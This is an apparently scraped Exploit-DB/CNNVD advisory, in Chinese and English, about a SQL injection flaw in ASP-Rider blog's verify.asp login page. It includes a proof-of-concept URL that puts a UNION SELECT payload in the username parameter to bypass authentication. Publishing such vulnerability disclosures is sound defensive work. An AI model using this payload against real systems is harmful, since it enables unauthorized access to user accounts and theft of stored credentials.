https://www.exploit-db.com/exploits/24840
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1115

Asp-rider的verify.asp存在SQL注入漏洞。远程攻击者借助username参数执行任意SQL语句和绕过认证。

source: http://www.securityfocus.com/bid/11933/info

A remote SQL injection vulnerability reportedly affects ASP-Rider Web blog. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries.

An attacker may exploit this issue to manipulate SQL queries to the underlying database. This may facilitate theft sensitive information, potentially including authentication credentials, and data corruption.

http://www.example.com/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1

来源:XF
名称:asp-rider-verify-sql-injection(18479)
链接:http://xforce.iss.net/xforce/xfdb/18479
来源:SECUNIA
名称:13470
链接:http://secunia.com/advisories/13470/
来源:BID
名称:11933
链接:http://www.securityfocus.com/bid/11933
来源:BUGTRAQ
名称:20041214ASP-riderisvulnerabletosqlinjectionattack
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110305802005220&w;=2